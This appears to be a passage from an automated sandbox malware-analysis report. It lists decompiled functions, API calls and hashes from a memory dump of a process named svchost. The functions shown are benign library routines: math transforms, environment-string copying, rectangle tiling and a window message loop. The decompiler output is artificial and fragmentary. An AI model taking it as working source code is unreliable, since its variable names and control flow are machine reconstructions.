						_t264 = _v284 - st1;
						_v276 = _t264;
						st0 = _t264;
						_v268 = _v288 + st1;
						asm("fild dword [esp+0x10]");
						_v292 =  *(_t210 + 0x30);
						asm("fmulp st1, st0");
						asm("fild dword [esp+0x10]");
						_v292 =  *(_t210 + 0x50);
						asm("fmulp st1, st0");
						asm("fild dword [esp+0x10]");
						asm("fmulp st1, st0");
						_v292 = _t225;
						asm("fild dword [esp+0x10]");
						asm("fmulp st1, st0");
						_v280 = _t207[0x38];
						_t273 = st0 + st2;
						_v292 = _t273;
						_t274 = _t273 - st1;
						_v284 = _t274;
						st0 = _t274;
						_v288 = _v280 + st1;
						_v280 = _v288 + _v292;
						asm("fsubr st0, st1");
						_v264 = _v284 *  *0x49a7b8 - _v280;
						_t289 = (_v288 - _v292) *  *0x49a7c0 - _v264;
						_v288 = _t289;
						asm("fxch st0, st1");
						_t292 = _t289 *  *0x49a7b4 - st1 + _v288;
						_v284 = _t292;
						st0 = _t292;
						 *_t165 = _v280 + _v260;
						 *((intOrPtr*)(_t165 + 0xe0)) = _v260 - _v280;
						 *((intOrPtr*)(_t165 + 0x20)) = _v264 + _v268;
						 *((intOrPtr*)(_t165 + 0xc0)) = _v268 - _v264;
						_t302 = _v288 + st1;
						 *((intOrPtr*)(_t165 + 0x40)) = _t302;
						 *((intOrPtr*)(_t165 + 0xa0)) = _t302 - _v288;
						 *((intOrPtr*)(_t165 + 0x80)) = _v284 + _v276;
						_t247 = _v276 - _v284;
						 *((intOrPtr*)(_t165 + 0x60)) = _t247;
					} else {
						_v292 =  *_t210;
						asm("fild dword [esp+0x10]");
						_t247 = _t247 *  *_t207;
						asm("fst dword [eax]");
						asm("fst dword [eax+0x20]");
						asm("fst dword [eax+0x40]");
						asm("fst dword [eax+0x60]");
						asm("fst dword [eax+0x80]");
						asm("fst dword [eax+0xa0]");
						asm("fst dword [eax+0xc0]");
						 *((intOrPtr*)(_t165 + 0xe0)) = _t247;
					}
					_t210 = _t210 + 2;
					_t207 =  &(_t207[1]);
					_t165 = _t165 + 4;
					_t228 = _v272 - 1;
					_v272 = _t228;
				} while (_t228 != 0);
				_t241 = _a16;
				_t229 =  &_v248;
				_v268 = 8;
				do {
					_t224 =  *_t241 + _a20;
					_v272 =  *((intOrPtr*)(_t229 - 8)) -  *((intOrPtr*)(_t229 + 8));
					_v288 = ( *_t229 -  *((intOrPtr*)(_t229 + 0x10))) *  *0x49a7c0 - st1;
					_t318 = st0 + st2;
					_v260 = _t318;
					asm("fxch st0, st1");
					asm("fxch st0, st1");
					st0 = _t318 - st1;
					_v276 = _v272 - _v288;
					_v288 =  *((intOrPtr*)(_t229 + 0x14)) +  *((intOrPtr*)(_t229 - 4));
					_v272 =  *((intOrPtr*)(_t229 - 4)) -  *((intOrPtr*)(_t229 + 0x14));
					_v280 = _v288 + st2;
					_t336 = (_v272 + st1) *  *0x49a7bc;
					_v292 = _t336;
					asm("fsubr dword [esp+0x10]");
					_v264 = _t336 *  *0x49a7b8 - _v280;
					_t342 = (_v288 - st1) *  *0x49a7c0 - _v264;
					_v288 = _t342;
					st0 = _t342;
					_v284 = _v272 *  *0x49a7b4 - _v292 + _v288;
					 *_t224 =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					 *((char*)(_t224 + 7)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					 *((char*)(_t224 + 1)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					 *((char*)(_t224 + 6)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					 *((char*)(_t224 + 2)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					 *((char*)(_t224 + 5)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					 *((char*)(_t224 + 4)) =  *((intOrPtr*)((E00470388() + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					_t197 = E00470388();
					_t229 = _t229 + 0x20;
					_t241 =  &_a4;
					 *((char*)(_t224 + 3)) =  *((intOrPtr*)((_t197 + 0x00000004 >> 0x00000003 & 0x000003ff) + _t205));
					_t203 = _v268 - 1;
					_v268 = _t203;
				} while (_t203 != 0);
				return _t203;
			}





































    0x00462670
    0x00462684
    0x00462692
    0x00462698
    0x0046269e
    0x004626a2
    0x004626aa
    0x004626be
    0x004626ca
    0x004626d5
    0x0046270f
    0x00462713
    0x00462720
    0x00462724
    0x0046272c
    0x0046272e
    0x00462735
    0x0046273f
    0x00462743
    0x00462747
    0x0046274f
    0x00462753
    0x00462759
    0x0046275d
    0x00462763
    0x00462769
    0x0046276d
    0x00462771
    0x00462773
    0x0046278d
    0x00462797
    0x0046279f
    0x004627a1
    0x004627a5
    0x004627ad
    0x004627b8
    0x004627bc
    0x004627c4
    0x004627c9
    0x004627cd
    0x004627d1
    0x004627d9
    0x004627dd
    0x004627e8
    0x004627ec
    0x004627f0
    0x004627f2
    0x004627f8
    0x004627fa
    0x004627fe
    0x00462800
    0x00462804
    0x0046280c
    0x0046281c
    0x00462836
    0x0046283c
    0x0046284e
    0x00462852
    0x00462856
    0x00462860
    0x00462864
    0x00462868
    0x00462872
    0x0046287c
    0x0046288a
    0x00462895
    0x0046289f
    0x004628a1
    0x004628a8
    0x004628b6
    0x004628c0
    0x004628c4
    0x004626d7
    0x004626da
    0x004626de
    0x004626e2
    0x004626e4
    0x004626e6
    0x004626e9
    0x004626ec
    0x004626ef
    0x004626f5
    0x004626fb
    0x00462701
    0x00462701
    0x004628cb
    0x004628ce
    0x004628d1
    0x004628d4
    0x004628d5
    0x004628d5
    0x004628df
    0x004628e6
    0x004628ea
    0x004628f2
    0x00462908
    0x0046290a
    0x00462920
    0x00462926
    0x00462928
    0x0046292c
    0x00462930
    0x00462932
    0x00462944
    0x0046295a
    0x00462964
    0x0046296e
    0x00462978
    0x0046297e
    0x00462988
    0x00462990
    0x004629a0
    0x004629a4
    0x004629a8
    0x004629bc
    0x004629e3
    0x004629f8
    0x00462a18
    0x00462a36
    0x00462a54
    0x00462a70
    0x00462a8a
    0x00462a8d
    0x00462a95
    0x00462aa0
    0x00462aa6
    0x00462aad
    0x00462aae
    0x00462aae
    0x00462ac2

    APIs
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: __ftol
    • String ID:
    • API String ID: 495808979-0
    • Opcode ID: f6279cb91c322ea7e4f9f9d3633a8d8b7f6129db6ce223f474c502b3f88a86cc
    • Instruction ID: 9c4059c8116cd24199c74e987a124d368cd11e9d63366b6d0c6c5600dd8f57bb
    • Opcode Fuzzy Hash: f6279cb91c322ea7e4f9f9d3633a8d8b7f6129db6ce223f474c502b3f88a86cc
    • Instruction Fuzzy Hash: 4BD132B2909342DFD301AF21D08925ABBB0FFD4744FA64999E0D56626AE331C578CF86
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004748E0 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004748E0() {
				int _v4;
				int _v8;
				intOrPtr _t7;
				CHAR* _t9;
				WCHAR* _t17;
				int _t20;
				char* _t24;
				int _t32;
				CHAR* _t36;
				WCHAR* _t38;
				void* _t39;
				int _t42;

				_t7 =  *0x4e1940; // 0x1
				_t32 = 0;
				_t38 = 0;
				_t36 = 0;
				if(_t7 != 0) {
					if(_t7 != 1) {
						if(_t7 != 2) {
							L27:
							return 0;
						}
						L18:
						if(_t36 != _t32) {
							L20:
							_t9 = _t36;
							if( *_t36 == _t32) {
								L23:
								_t41 = _t9 - _t36 + 1;
								_t39 = E00471697(_t9 - _t36 + 1);
								if(_t39 != _t32) {
									E00472FB0(_t39, _t36, _t41);
								} else {
									_t39 = 0;
								}
								FreeEnvironmentStringsA(_t36);
								return _t39;
							} else {
								goto L21;
							}
							do {
								do {
									L21:
									_t9 =  &(_t9[1]);
								} while ( *_t9 != _t32);
								_t9 =  &(_t9[1]);
							} while ( *_t9 != _t32);
							goto L23;
						}
						_t36 = GetEnvironmentStrings();
						if(_t36 == _t32) {
							goto L27;
						}
						goto L20;
					}
					L6:
					if(_t38 != _t32) {
						L8:
						_t17 = _t38;
						if( *_t38 == _t32) {
							L11:
							_t20 = (_t17 - _t38 >> 1) + 1;
							_v4 = _t20;
							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
							if(_t42 != _t32) {
								_t24 = E00471697(_t42);
								_v8 = _t24;
								if(_t24 != _t32) {
									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
										E004715AE(_v8);
										_v8 = _t32;
									}
									_t32 = _v8;
								}
							}
							FreeEnvironmentStringsW(_t38);
							return _t32;
						} else {
							goto L9;
						}
						do {
							do {
								L9:
								_t17 =  &(_t17[1]);
							} while ( *_t17 != _t32);
							_t17 =  &(_t17[1]);
						} while ( *_t17 != _t32);
						goto L11;
					}
					_t38 = GetEnvironmentStringsW();
					if(_t38 == _t32) {
						goto L27;
					}
					goto L8;
				}
				_t38 = GetEnvironmentStringsW();
				if(_t38 == 0) {
					_t36 = GetEnvironmentStrings();
					if(_t36 == 0) {
						goto L27;
					}
					 *0x4e1940 = 2;
					goto L18;
				}
				 *0x4e1940 = 1;
				goto L6;
			}















    0x004748e2
    0x004748f1
    0x004748f3
    0x004748f5
    0x004748f9
    0x00474931
    0x004749bb
    0x00474a09
    0x00000000
    0x00474a09
    0x004749bd
    0x004749bf
    0x004749cd
    0x004749cf
    0x004749d1
    0x004749dd
    0x004749e0
    0x004749e8
    0x004749ed
    0x004749f6
    0x004749ef
    0x004749ef
    0x004749ef
    0x004749ff
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004749d3
    0x004749d3
    0x004749d3
    0x004749d3
    0x004749d4
    0x004749d8
    0x004749d9
    0x00000000
    0x004749d3
    0x004749c7
    0x004749cb
    0x00000000
    0x00000000
    0x00000000
    0x004749cb
    0x00474937
    0x00474939
    0x00474947
    0x0047494a
    0x0047494c
    0x0047495c
    0x00474968
    0x0047496f
    0x00474975
    0x00474979
    0x0047497c
    0x00474984
    0x00474988
    0x00474999
    0x0047499f
    0x004749a5
    0x004749a5
    0x004749a9
    0x004749a9
    0x00474988
    0x004749ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0047494e
    0x0047494e
    0x0047494e
    0x0047494f
    0x00474950
    0x00474956
    0x00474957
    0x00000000
    0x0047494e
    0x0047493d
    0x00474941
    0x00000000
    0x00000000
    0x00000000
    0x00474941
    0x004748fd
    0x00474901
    0x00474915
    0x00474919
    0x00000000
    0x00000000
    0x0047491f
    0x00000000
    0x0047491f
    0x00474903
    0x00000000

    APIs
    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 004748FB
    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 0047490F
    • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 0047493B
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0046FDF2), ref: 00474973
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,0046FDF2), ref: 00474995
    • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,0046FDF2), ref: 004749AE
    • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,0046FDF2), ref: 004749C1
    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004749FF
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: EnvironmentStrings$ByteCharFreeMultiWide
    • String ID:
    • API String ID: 1823725401-0
    • Opcode ID: f390ea38b9152bbb38d531475fff5d16c81597ed866802095eafa9c2050ade0a
    • Instruction ID: c8cfb7c029db317747a212152139d9000991915c5b2a8a7c9a9de51af1cee6e0
    • Opcode Fuzzy Hash: f390ea38b9152bbb38d531475fff5d16c81597ed866802095eafa9c2050ade0a
    • Instruction Fuzzy Hash: 143135F25042656F97303BB89CC48BFBA9CE6C53587158A3FF65AC3210E7288C4186AD
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00424D20 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 170COMMON
    Download Yara Rule
    C-Code - Quality: 95%
    			E00424D20(intOrPtr __ecx, void* __fp0, intOrPtr _a4, int* _a8, long* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v4;
				int _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				struct tagRECT _v80;
				intOrPtr _v84;
				int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr _v104;
				void* __ebp;
				intOrPtr _t72;
				int* _t74;
				long* _t75;
				intOrPtr _t79;
				int _t80;
				void* _t95;
				int _t101;
				intOrPtr _t102;
				int _t105;
				int _t107;
				int* _t108;
				intOrPtr _t110;
				int _t124;
				int _t138;
				int _t139;
				intOrPtr _t142;
				void* _t160;

				_t160 = __fp0;
				_t72 = _a16;
				_v96 = __ecx;
				if(_t72 < 1 || _t72 > 8 || _a24 < 2) {
					L26:
					__eflags = 0;
					return 0;
				} else {
					_t74 = _a8;
					_t139 =  *_t74;
					_t138 = _t74[1];
					_t107 = _t74[2];
					_v8 = _t107;
					_t108 = _t107 - _t139;
					_t101 = _t74[3];
					_a8 = _t108;
					_v4 = _t101;
					if(_t108 <= 0) {
						goto L26;
					} else {
						_t102 = _t101 - _t138;
						_v84 = _t102;
						if(_t102 <= 0) {
							goto L26;
						} else {
							_t75 = _a12;
							if(_t75 != 0) {
								_v48.left =  *_t75;
								_v48.top = _t75[1];
								_v48.right = _t75[2];
								_v48.bottom = _t75[3];
							}
							_t124 = 0;
							_v92 = 1;
							_v100 = 0;
							if(_t102 > 0) {
								_t142 =  *0x492494;
								while(1) {
									_v104 = 0x32;
									_t79 = _t102 - _t124;
									if(_t79 <= 0x32) {
										_v104 = _t79;
									}
									_t80 = 0;
									if(_t108 <= 0) {
										goto L22;
									}
									_v88 = _v104 + _t124;
									do {
										_t110 = _t108 - _t80;
										if(_t110 > 0x32) {
											_t110 = 0x32;
										}
										_t105 = _t110 + _t80;
										SetRect( &_v80, _t80, _t124, _t105, _v88);
										OffsetRect( &_v80, _t139, _t138);
										if(_a12 != 0) {
											IntersectRect( &_v80,  &_v80,  &_v48);
										}
										if(IsRectEmpty( &_v80) != 0) {
											goto L20;
										} else {
											_v64.top = _v80.top;
											_v64.left = _v80.left;
											_v64.right = _v80.right;
											_v64.bottom = _v80.bottom;
											OffsetRect( &_v64,  ~_t139,  ~_t138);
											_v24 = _v64.right;
											_v32 = _v64.left;
											_v28 = _v64.top;
											_v20 = _v64.bottom;
											_t95 = E00424330(_v96, _t160, _a16, _v8 - _t139, _v4 - _t138, _a20, _a24,  &_v32);
											_t157 = _t95 - 1;
											if(_t95 != 1) {
												_v92 = 0;
											} else {
												_push(_a28);
												_push(_v80.top);
												_push(_v80.left);
												E00424BE0(_v96, _t142, _t157, _a4);
												goto L20;
											}
										}
										goto L25;
										L20:
										_t108 = _a8;
										_t124 = _v100;
										_t80 = _t105;
									} while (_t80 < _t108);
									_t102 = _v84;
									L22:
									_t124 = _t124 + _v104;
									_v100 = _t124;
									if(_t124 < _t102) {
										continue;
									}
									goto L25;
								}
							}
							L25:
							E00423EF0(_v96);
							return _v92;
						}
					}
				}
			}




































    0x00424d20
    0x00424d23
    0x00424d2d
    0x00424d31
    0x00424f43
    0x00424f43
    0x00424f49
    0x00424d4e
    0x00424d4e
    0x00424d52
    0x00424d54
    0x00424d57
    0x00424d5a
    0x00424d5e
    0x00424d60
    0x00424d63
    0x00424d69
    0x00424d6d
    0x00000000
    0x00424d73
    0x00424d73
    0x00424d77
    0x00424d7b
    0x00000000
    0x00424d81
    0x00424d81
    0x00424d8a
    0x00424d8e
    0x00424d95
    0x00424d9c
    0x00424da3
    0x00424da3
    0x00424da7
    0x00424dac
    0x00424db4
    0x00424db8
    0x00424dbe
    0x00424dc4
    0x00424dc6
    0x00424dce
    0x00424dd3
    0x00424dd5
    0x00424dd5
    0x00424dd9
    0x00424ddd
    0x00000000
    0x00000000
    0x00424de9
    0x00424ded
    0x00424ded
    0x00424df2
    0x00424df4
    0x00424df4
    0x00424df9
    0x00424e09
    0x00424e16
    0x00424e21
    0x00424e32
    0x00424e32
    0x00424e45
    0x00000000
    0x00424e4b
    0x00424e57
    0x00424e5b
    0x00424e63
    0x00424e6b
    0x00424e7a
    0x00424e88
    0x00424e90
    0x00424ea0
    0x00424ea8
    0x00424ecb
    0x00424ed0
    0x00424ed3
    0x00424f22
    0x00424ed5
    0x00424ee4
    0x00424eec
    0x00424eed
    0x00424ef3
    0x00000000
    0x00424ef3
    0x00424ed3
    0x00000000
    0x00424ef8
    0x00424ef8
    0x00424eff
    0x00424f03
    0x00424f05
    0x00424f0d
    0x00424f11
    0x00424f11
    0x00424f17
    0x00424f1b
    0x00000000
    0x00424f1d
    0x00000000
    0x00424f1b
    0x00424dc4
    0x00424f2a
    0x00424f2e
    0x00424f3e
    0x00424f3e
    0x00424d7b
    0x00424d6d

    APIs
    • SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00424E09
    • OffsetRect.USER32(?,?,?), ref: 00424E16
    • IntersectRect.USER32(?,?,?), ref: 00424E32
    • IsRectEmpty.USER32(?), ref: 00424E3D
    • OffsetRect.USER32(?,?,?), ref: 00424E7A
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Offset$EmptyIntersect
    • String ID: 2
    • API String ID: 765610062-450215437
    • Opcode ID: 47de2460904ce778aa9f134a4f409e8f97a0f5e5b9c6d25e81132d965d15c7c2
    • Instruction ID: b2abdc1cb0440d022a9c70847020d8c1bd12ad97ac357666a244aef23a30882a
    • Opcode Fuzzy Hash: 47de2460904ce778aa9f134a4f409e8f97a0f5e5b9c6d25e81132d965d15c7c2
    • Instruction Fuzzy Hash: 096113756083419FD318CF29D984A6BBBE9FBC8304F548A2EF58987320D774E905CB56
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00486E8F Relevance: 10.6, APIs: 7, Instructions: 122windowCOMMON
    Download Yara Rule
    C-Code - Quality: 97%
    			E00486E8F(intOrPtr* __ecx) {
				struct HWND__* _t45;
				intOrPtr* _t54;
				int _t63;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr* _t78;
				struct tagMSG* _t80;
				void* _t81;

				_t67 = 1;
				_t78 = __ecx;
				 *((intOrPtr*)(_t81 + 0x18)) = _t67;
				 *(_t81 + 0x14) = 0;
				if(( *(_t81 + 0x28) & 0x00000004) == 0) {
					L2:
					 *((intOrPtr*)(_t81 + 0x10)) = 0;
					L3:
					_t45 = GetParent( *(_t78 + 0x1c));
					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x00000018;
					 *(_t81 + 0x1c) = _t45;
					_t80 = L00487FB8() + 0x30;
					L4:
					while( *((intOrPtr*)(_t81 + 0x18)) == 0 || PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
						while( *((intOrPtr*)( *((intOrPtr*)(L00487FB8())) + 0x5c))() != 0) {
							if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
								_t63 = _t80->message;
								if(_t63 == 0x118 || _t63 == 0x104) {
									E00487621(_t78, 1);
									UpdateWindow( *(_t78 + 0x1c));
									 *((intOrPtr*)(_t81 + 0x10)) = 0;
								}
							}
							if( *((intOrPtr*)( *_t78 + 0x70))() == 0) {
								 *(_t78 + 0x24) =  *(_t78 + 0x24) & 0xffffffe7;
								return  *((intOrPtr*)(_t78 + 0x2c));
							} else {
								_t54 = L00487FB8();
								_push(_t80);
								if( *((intOrPtr*)( *_t54 + 0x64))() != 0) {
									 *((intOrPtr*)(_t81 + 0x18)) = 1;
									 *(_t81 + 0x14) = 0;
								}
								if(PeekMessageA(_t80, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L4;
								}
							}
						}
						return E0048DABD(0) | 0xffffffff;
					}
					if( *((intOrPtr*)(_t81 + 0x10)) != 0) {
						E00487621(_t78, 1);
						UpdateWindow( *(_t78 + 0x1c));
						 *((intOrPtr*)(_t81 + 0x10)) = 0;
					}
					if(( *(_t81 + 0x24) & 0x00000001) == 0 &&  *(_t81 + 0x1c) != 0 &&  *(_t81 + 0x14) == 0) {
						SendMessageA( *(_t81 + 0x28), 0x121, 0,  *(_t78 + 0x1c));
					}
					if(( *(_t81 + 0x24) & 0x00000002) != 0) {
						L14:
						 *((intOrPtr*)(_t81 + 0x18)) = 0;
						goto L4;
					} else {
						 *(_t81 + 0x14) =  *(_t81 + 0x14) + 1;
						if(SendMessageA( *(_t78 + 0x1c), 0x36a, 0,  *(_t81 + 0x14)) != 0) {
							goto L4;
						}
						goto L14;
					}
				}
				_t66 = E004874EA(__ecx);
				 *((intOrPtr*)(_t81 + 0x10)) = _t67;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}











    0x00486e9f
    0x00486ea0
    0x00486ea2
    0x00486ea6
    0x00486eaa
    0x00486ebc
    0x00486ebc
    0x00486ec0
    0x00486ec3
    0x00486ec9
    0x00486ecd
    0x00486ede
    0x00000000
    0x00486ee1
    0x00486f5d
    0x00486f71
    0x00486f73
    0x00486f7b
    0x00486f88
    0x00486f90
    0x00486f92
    0x00486f92
    0x00486f7b
    0x00486f9f
    0x00486fdd
    0x00000000
    0x00486fa1
    0x00486fa1
    0x00486fa8
    0x00486fb0
    0x00486fb2
    0x00486fba
    0x00486fba
    0x00486fcb
    0x00000000
    0x00486fcd
    0x00000000
    0x00486fcd
    0x00486fcb
    0x00486f9f
    0x00000000
    0x00486fd8
    0x00486efa
    0x00486f00
    0x00486f08
    0x00486f0a
    0x00486f0a
    0x00486f13
    0x00486f2e
    0x00486f2e
    0x00486f39
    0x00486f57
    0x00486f57
    0x00000000
    0x00486f3b
    0x00486f3f
    0x00486f55
    0x00000000
    0x00000000
    0x00000000
    0x00486f55
    0x00486f39
    0x00486eac
    0x00486eb6
    0x00486eba
    0x00000000
    0x00000000
    0x00000000

    APIs
    • GetParent.USER32(?), ref: 00486EC3
    • PeekMessageA.USER32 ref: 00486EEC
    • UpdateWindow.USER32(?), ref: 00486F08
    • SendMessageA.USER32(?,00000121,00000000,?), ref: 00486F2E
    • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 00486F4D
    • UpdateWindow.USER32(?), ref: 00486F90
    • PeekMessageA.USER32 ref: 00486FC3
      • Part of subcall function 004874EA: GetWindowLongA.USER32(?,000000F0), ref: 004874F6
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Message$Window$PeekSendUpdate$LongParent
    • String ID:
    • API String ID: 2853195852-0
    • Opcode ID: 5d80c3546c3c06cbc9cf61fb37afc56697750ee0b74688dac5dc1ecd0fd277dd
    • Instruction ID: 50af27898e8295f3eddc0b00c52b135bbb950d658d7d0c2e19d690325be9f92d
    • Opcode Fuzzy Hash: 5d80c3546c3c06cbc9cf61fb37afc56697750ee0b74688dac5dc1ecd0fd277dd
    • Instruction Fuzzy Hash: 1741D030608341ABD760AF26D948E2FBAE4FFC1B14F110D2FF68192291D779D944CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0047C0F8 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
    Download Yara Rule
    C-Code - Quality: 78%
    			E0047C0F8(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
				int _v8;
				intOrPtr _v20;
				short* _v28;
				short _v32;
				int _v36;
				short* _v40;
				void* _v56;
				int _t31;
				int _t32;
				int _t37;
				int _t43;
				int _t44;
				int _t45;
				void* _t53;
				short* _t60;
				int _t61;
				intOrPtr _t62;
				short* _t63;

				_push(0xffffffff);
				_push(0x49e260);
				_push(E00472CF4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t62;
				_t63 = _t62 - 0x18;
				_v28 = _t63;
				_t31 =  *0x4e1a04; // 0x1
				if(_t31 != 0) {
					L6:
